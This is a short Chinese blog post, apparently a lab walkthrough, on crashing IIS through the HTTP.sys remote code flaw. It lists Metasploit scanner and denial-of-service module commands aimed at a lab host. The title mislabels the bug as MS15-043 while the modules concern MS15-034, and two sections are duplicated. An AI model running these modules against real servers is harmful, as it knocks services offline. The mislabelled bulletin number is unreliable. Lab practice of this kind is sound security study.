http.sys_DDos攻击(ms15-043)
作者:互联网
远程执行代码漏洞存在于HTTP协议堆栈(HTTP.sys)中,当HTTP.sys未正确分析经特殊设计的HTTP请求时会导致该漏洞。该漏洞利用成功可使目标机器蓝屏。
微软官方说明:
https://docs.microsoft.com/zh-cn/security-updates/Securitybulletins/2015/ms15-043?redirectedfrom=MSDN
1、环境搭建
使用的是Windows server 2008 R2 x64里面自带的II7。
2、漏洞验证
该scanner与exp早已在msf中集成
加载漏洞验证模块
use auxiliary/scanner/http/ms15_034_http_sys_memory_dump
set rhosts 192.168.112.130
3、漏洞利用
加载漏洞利用模块
use auxiliary/dos/http/ms15_034_ulonglongadd
被攻击主机瞬间蓝屏。
2、漏洞验证
该scanner与exp早已在msf中集成
加载漏洞验证模块
use auxiliary/scanner/http/ms15_034_http_sys_memory_dump
set rhosts 192.168.112.130
3、漏洞利用
加载漏洞利用模块
use auxiliary/dos/http/ms15_034_ulonglongadd
被攻击主机瞬间蓝屏。
标签:http,sys,漏洞,DDos,ms15,HTTP,蓝屏 来源: https://www.cnblogs.com/Smoke-star/p/11698712.html